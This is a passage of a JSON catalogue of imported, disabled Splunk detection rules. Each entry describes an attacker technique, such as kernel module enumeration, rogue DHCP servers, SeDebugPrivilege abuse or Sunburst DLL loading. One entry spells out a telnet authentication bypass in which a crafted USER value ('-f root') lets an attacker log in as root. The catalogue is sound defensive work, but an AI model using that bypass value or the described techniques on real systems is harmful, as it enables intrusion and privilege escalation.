"imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-renamed-rclone.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6dca1124-b3ec-11eb-9328-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_renamed_rclone.yml" } }, { "id": "splunk-security-content-6df99886-0e04-4c11-8b88-325747419278", "type": "detection", "name": "Linux Kernel Module Enumeration", "description": "The following analytic identifies the use of the 'kmod' process to list kernel modules on a Linux system. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. While listing kernel modules is not inherently malicious, it can be a precursor to loading unauthorized modules using 'insmod'. If confirmed malicious, this activity could allow an attacker to load kernel modules, potentially leading to privilege escalation, persistence, or other malicious actions within the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-kernel-module-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6df99886-0e04-4c11-8b88-325747419278", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_kernel_module_enumeration.yml" } }, { "id": "splunk-security-content-6e0913d4-5461-487c-9dce-6d22ef2c0f03", "type": "detection", "name": "Linux Telnet Authentication Bypass", "description": "Detects an authentication bypass in telnet tracked as CVE-2026-24061. An attacker can supply a specifically crafted USER environment variable (-f root) that is passed to /usr/bin/login. Because this input isn't sanitized an attacker can force the system to skip authentication and login directly as root.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-telnet-authentication-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e0913d4-5461-487c-9dce-6d22ef2c0f03", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_telnet_authentication_bypass.yml" } }, { "id": "splunk-security-content-6e1ad5d4-d9af-496a-96ec-f31c11cd09f2", "type": "detection", "name": "Windows Outlook WebView Registry Modification", "description": "The following analytic identifies modifications to specific Outlook registry values related to WebView and Today features. It detects when a URL is set in these registry locations, which could indicate attempts to manipulate Outlook's web-based components. The analytic focuses on changes to the \"URL\" value within Outlook's WebView and Today registry paths. This activity is significant as it may represent an attacker's effort to redirect Outlook's web content or inject malicious URLs. If successful, this technique could lead to phishing attempts, data theft, or serve as a stepping stone for further compromise of the user's email client and potentially sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-webview-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e1ad5d4-d9af-496a-96ec-f31c11cd09f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_webview_registry_modification.yml" } }, { "id": "splunk-security-content-6e1ada88-7a0d-4ac1-92c6-03d354686079", "type": "detection", "name": "Detect Rogue DHCP Server", "description": "The following analytic identifies the presence of unauthorized DHCP servers on the network. It leverages logs from Cisco network devices with DHCP Snooping enabled, specifically looking for events where DHCP leases are issued from untrusted ports. This activity is significant because rogue DHCP servers can facilitate Man-in-the-Middle attacks, leading to potential data interception and network disruption. If confirmed malicious, this could allow attackers to redirect network traffic, capture sensitive information, and compromise the integrity of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1498", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rogue-dhcp-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e1ada88-7a0d-4ac1-92c6-03d354686079", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_rogue_dhcp_server.yml" } }, { "id": "splunk-security-content-6e2574b3-e24b-4321-ae3c-ba83a75bb714", "type": "detection", "name": "Linux Auditd Auditd Daemon Shutdown", "description": "The following analytic detects the unexpected termination of the Linux Audit daemon (auditd) by monitoring for log entries of type DAEMON_END. This event signifies that the audit logging service has stopped, either due to a legitimate system shutdown, manual administrative action, or potentially malicious tampering. Since auditd is responsible for recording critical security events, its sudden stoppage may indicate an attempt to disable security monitoring or evade detection during an attack. This detection should be correlated with system logs to determine whether the shutdown was part of routine maintenance or an anomaly. If confirmed as malicious, this could lead to a compromised system where security events are no longer being logged, allowing attackers to operate undetected. Therefore, monitoring and alerting on auditd shutdown events is crucial for maintaining the integrity of system security monitoring.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-auditd-daemon-shutdown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e2574b3-e24b-4321-ae3c-ba83a75bb714", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_auditd_daemon_shutdown.yml" } }, { "id": "splunk-security-content-6e4c4588-ba2f-42fa-97e6-9f6f548eaa33", "type": "detection", "name": "Shim Database File Creation", "description": "The following analytic detects the creation of shim database files (.sdb) in default directories using the sdbinst.exe application. It leverages filesystem activity data from the Endpoint.Filesystem data model to identify file writes to the Windows\\AppPatch\\Custom directory. This activity is significant because shims can intercept and alter API calls, potentially allowing attackers to bypass security controls or execute malicious code. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/shim-database-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e4c4588-ba2f-42fa-97e6-9f6f548eaa33", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/shim_database_file_creation.yml" } }, { "id": "splunk-security-content-6e5a3ae4-90a3-462d-9aa6-0119f638c0f1", "type": "detection", "name": "Hiding Files And Directories With Attrib exe", "description": "The following analytic detects the use of the Windows binary attrib.exe to hide files or directories by marking them with specific flags. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments that include the \"+h\" flag. This activity is significant because hiding files can be a tactic used by attackers to conceal malicious files or tools from users and security software. If confirmed malicious, this behavior could allow an attacker to persist in the environment undetected, potentially leading to further compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hiding-files-and-directories-with-attrib-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e5a3ae4-90a3-462d-9aa6-0119f638c0f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml" } }, { "id": "splunk-security-content-6e9d4f7a-3c8b-4a9e-8d2f-7b5c9e1a6f3d", "type": "detection", "name": "Cisco ASA - Reconnaissance Command Activity", "description": "This analytic detects potential reconnaissance activities on Cisco ASA devices by identifying execution of multiple information-gathering \"show\" commands within a short timeframe.\nAdversaries who gain initial access to network infrastructure devices typically perform systematic reconnaissance to understand the device configuration, network topology, security policies, connected systems, and potential attack paths. This reconnaissance phase involves executing multiple \"show\" commands to enumerate device details, running configurations, active connections, routing information, and VPN sessions.\nThe detection monitors for command execution events (message ID 111009) containing reconnaissance-oriented \"show\" commands (such as show running-config, show version, show interface, show crypto, show conn, etc.) and triggers when 7 or more distinct reconnaissance commands are executed within a 5-minute window by the same user.\nInvestigate reconnaissance bursts from non-administrative accounts, unusual source IP addresses, activity during off-hours, methodical command sequences suggesting automated enumeration, or reconnaissance activity correlated with other suspicious behaviors.\nWe recommend adapting the detection filters to exclude known legitimate administrative activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1590.001", "T1590.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-reconnaissance-command-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6e9d4f7a-3c8b-4a9e-8d2f-7b5c9e1a6f3d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___reconnaissance_command_activity.yml" } }, { "id": "splunk-security-content-6ece9ed0-5f92-4315-889d-48560472b188", "type": "detection", "name": "Windows Access Token Manipulation SeDebugPrivilege", "description": "The following analytic detects a process enabling the \"SeDebugPrivilege\" privilege token. It leverages Windows Security Event Logs with EventCode 4703, filtering out common legitimate processes. This activity is significant because SeDebugPrivilege allows a process to inspect and modify the memory of other processes, potentially leading to credential dumping or code injection. If confirmed malicious, an attacker could gain extensive control over system processes, enabling them to escalate privileges, persist in the environment, or access sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-access-token-manipulation-sedebugprivilege.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ece9ed0-5f92-4315-889d-48560472b188", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_access_token_manipulation_sedebugprivilege.yml" } }, { "id": "splunk-security-content-6ed33786-5e87-4f55-b62c-cb5f1168b831", "type": "detection", "name": "Suspicious Java Classes", "description": "The following analytic identifies suspicious Java classes often used for remote command execution exploits in Java frameworks like Apache Struts.\nIt detects this activity by analyzing HTTP POST requests with specific content patterns using Splunk's `stream_http` data source.\nThis behavior is significant because it may indicate an attempt to exploit vulnerabilities in web applications, potentially leading to unauthorized remote code execution.\nIf confirmed malicious, this activity could allow attackers to execute arbitrary commands on the server, leading to data breaches, system compromise, and further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-java-classes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ed33786-5e87-4f55-b62c-cb5f1168b831", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/suspicious_java_classes.yml" } }, { "id": "splunk-security-content-6f3ccfa2-91fe-11eb-8f9b-acde48001122", "type": "detection", "name": "Disable Show Hidden Files", "description": "The following analytic detects modifications to the Windows registry that disable the display of hidden files. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with hidden file settings. This activity is significant because malware, such as worms and trojan spyware, often use hidden files to evade detection. If confirmed malicious, this behavior could allow an attacker to conceal malicious files on the system, making it harder for security tools and analysts to identify and remove the threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001", "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-show-hidden-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6f3ccfa2-91fe-11eb-8f9b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_show_hidden_files.yml" } }, { "id": "splunk-security-content-6f42b8be-8e96-11ec-ad5a-acde48001122", "type": "detection", "name": "Windows Rasautou DLL Execution", "description": "The following analytic detects the execution of an arbitrary DLL by the Windows Remote Auto Dialer (rasautou.exe). This behavior is identified by analyzing process creation events where rasautou.exe is executed with specific command-line arguments. This activity is significant because it leverages a Living Off The Land Binary (LOLBin) to execute potentially malicious code, bypassing traditional security controls. If confirmed malicious, this technique could allow an attacker to execute arbitrary code, potentially leading to system compromise, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rasautou-dll-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6f42b8be-8e96-11ec-ad5a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rasautou_dll_execution.yml" } }, { "id": "splunk-security-content-6f6c8fd7-6a6b-4af9-a0e9-57cfc47a58b4", "type": "detection", "name": "Windows Unusual Count Of Users Failed To Authenticate Using NTLM", "description": "The following analytic identifies a source endpoint failing to authenticate multiple valid users using the NTLM protocol, potentially indicating a Password Spraying attack. It leverages Event 4776 from Domain Controllers, calculating the standard deviation for each host and applying the 3-sigma rule to detect anomalies. This activity is significant as it may represent an adversary attempting to gain initial access or elevate privileges. If confirmed malicious, the attacker could compromise multiple accounts, leading to unauthorized access and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-failed-to-authenticate-using-ntlm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6f6c8fd7-6a6b-4af9-a0e9-57cfc47a58b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_failed_to_authenticate_using_ntlm.yml" } }, { "id": "splunk-security-content-6fa0073d-6ca0-4f93-913d-fb420c9de15b", "type": "detection", "name": "ESXi Sensitive Files Accessed", "description": "This detection identifies access to sensitive system and configuration files on an ESXi host, including authentication data, service configurations, and VMware-specific management settings. Interaction with these files may indicate adversary reconnaissance, credential harvesting, or preparation for privilege escalation, lateral movement, or persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.008", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-sensitive-files-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6fa0073d-6ca0-4f93-913d-fb420c9de15b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_sensitive_files_accessed.yml" } }, { "id": "splunk-security-content-6fa31414-546e-11ec-adfa-acde48001122", "type": "detection", "name": "Short Lived Scheduled Task", "description": "The following analytic detects the creation and deletion of scheduled tasks within a short time frame (less than 30 seconds) using Windows Security EventCodes 4698 and 4699. This behavior is identified by analyzing Windows Security Event Logs and leveraging the Windows TA for parsing. Such activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this could lead to unauthorized access, data exfiltration, or execution of malicious payloads, necessitating prompt investigation and response by security analysts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/short-lived-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6fa31414-546e-11ec-adfa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/short_lived_scheduled_task.yml" } }, { "id": "splunk-security-content-6fc46cae-a8c0-4296-b07a-8e52d4322587", "type": "detection", "name": "Windows Wmic CPU Discovery", "description": "The following analytic detects the use of WMIC (Windows Management Instrumentation Command-line) for CPU discovery, often executed with commands such as \u201cwmic cpu get name\u201d This behavior is commonly associated with reconnaissance, where adversaries seek to gather details about system hardware, assess processing power, or determine if the environment is virtualized. While WMIC is a legitimate administrative tool, its use for CPU queries outside of normal inventory or management scripts can indicate malicious intent. Monitoring command-line executions of WMIC with CPU-related arguments and correlating with other discovery activity can help identify attacker reconnaissance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-cpu-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6fc46cae-a8c0-4296-b07a-8e52d4322587", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_cpu_discovery.yml" } }, { "id": "splunk-security-content-6fe42e07-15b1-4caa-b547-7885666cb1bd", "type": "detection", "name": "Microsoft Intune Device Health Scripts", "description": "Microsoft Intune device remediation scripts are a tool administrators can use to remotely manage devices, this functionality can also be abused for SYSTEM level code execution and lateral movement to intune managed devices. This detection identifies when a new device health script has been added, updated or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072", "T1021.007", "T1202", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-device-health-scripts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6fe42e07-15b1-4caa-b547-7885666cb1bd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_device_health_scripts.yml" } }, { "id": "splunk-security-content-6ffc7f88-415b-4278-a80d-b957d6539e1a", "type": "detection", "name": "Windows SIP WinVerifyTrust Failed Trust Validation", "description": "The following analytic detects failed trust validation attempts using Windows Event Log - CAPI2 (CryptoAPI 2). It specifically triggers on EventID 81, which indicates that \"The digital signature of the object did not verify.\" This detection leverages the CAPI2 Operational log to identify instances where digital signatures fail to validate. Monitoring this activity is crucial as it can indicate attempts to execute untrusted or potentially malicious binaries. If confirmed malicious, this activity could allow attackers to bypass security controls and execute unauthorized code, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sip-winverifytrust-failed-trust-validation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ffc7f88-415b-4278-a80d-b957d6539e1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sip_winverifytrust_failed_trust_validation.yml" } }, { "id": "splunk-security-content-700c11d1-da09-47b2-81aa-358c143c7986", "type": "detection", "name": "Windows AD GPO New CSE Addition", "description": "This detection identifies when a a new client side extension is added to an Active Directory Group Policy using the Group Policy Management Console.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-gpo-new-cse-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "700c11d1-da09-47b2-81aa-358c143c7986", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_gpo_new_cse_addition.yml" } }, { "id": "splunk-security-content-701a8740-e8db-40df-9190-5516d3819787", "type": "detection", "name": "Sunburst Correlation DLL and Network Event", "description": "The following analytic identifies the loading of the malicious SolarWinds.Orion.Core.BusinessLayer.dll by SolarWinds.BusinessLayerHost.exe and subsequent DNS queries to avsvmcloud.com. It uses Sysmon EventID 7 for DLL loading and Event ID 22 for DNS queries, correlating these events within a 12-14 day period. This activity is significant as it indicates potential Sunburst malware infection, a known supply chain attack. If confirmed malicious, this could lead to unauthorized network access, data exfiltration, and further compromise of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sunburst-correlation-dll-and-network-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "701a8740-e8db-40df-9190-5516d3819787", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sunburst_correlation_dll_and_network_event.yml" } }, { "id": "splunk-security-content-70803451-0047-4e12-9d63-77fa7eb8649c", "type": "detection", "name": "Remote System Discovery with Adsisearcher", "description": "The following analytic detects the use of the `[Adsisearcher]` type accelerator in PowerShell scripts to query Active Directory for domain computers. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific script blocks containing `adsisearcher` and `objectcategory=computer` with methods like `findAll()` or `findOne()`. This activity is significant as it may indicate an attempt by adversaries or Red Teams to perform Active Directory discovery and gain situational awareness. If confirmed malicious, this could lead to further reconnaissance and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-system-discovery-with-adsisearcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "70803451-0047-4e12-9d63-77fa7eb8649c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_system_discovery_with_adsisearcher.yml" } }, { "id": "splunk-security-content-70a050a2-8537-488a-a628-b60a9558d96a", "type": "detection", "name": "O365 Email Send Attachments Excessive Volume", "description": "The following analytic identifies when an O365 email account sends an excessive number of email attachments to external recipients within a short period (within 1 hour). This behavior may indicate a compromised account where the threat actor is attempting to exfiltrate data from the mailbox. Threat actors may attempt to transfer data through email as a simple means of exfiltration from the compromised mailbox. Some account owner legitimate behaviors can trigger this alert, however these actions may not be aligned with organizational expectations / best practice behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.008", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-send-attachments-excessive-volume.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "70a050a2-8537-488a-a628-b60a9558d96a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_send_attachments_excessive_volume.yml" } }, { "id": "splunk-security-content-70f7c952-0758-46d6-9148-d8969c4481d1", "type": "detection", "name": "Windows Gather Victim Network Info Through Ip Check Web Services", "description": "The following analytic detects processes attempting to connect to known IP check web services. This behavior is identified using Sysmon EventCode 22 logs, specifically monitoring DNS queries to services like \"wtfismyip.com\" and \"ipinfo.io\". This activity is significant as it is commonly used by malware, such as Trickbot, for reconnaissance to determine the infected machine's IP address. If confirmed malicious, this could allow attackers to gather network information, aiding in further attacks or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-gather-victim-network-info-through-ip-check-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "70f7c952-0758-46d6-9148-d8969c4481d1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_gather_victim_network_info_through_ip_check_web_services.yml" } }, { "id": "splunk-security-content-70fac80e-0bf1-11ec-9ba0-acde48001122", "type": "detection", "name": "Get-ForestTrust with PowerShell Script Block", "description": "The following analytic detects the execution of the Get-ForestTrust command from PowerSploit using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, providing detailed visibility into potentially suspicious activities. Monitoring this behavior is crucial as it can indicate an attempt to gather domain trust information, which is often a precursor to lateral movement or privilege escalation. If confirmed malicious, this activity could allow an attacker to map trust relationships within the domain, facilitating further exploitation and access to sensitive resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-foresttrust-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "70fac80e-0bf1-11ec-9ba0-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", 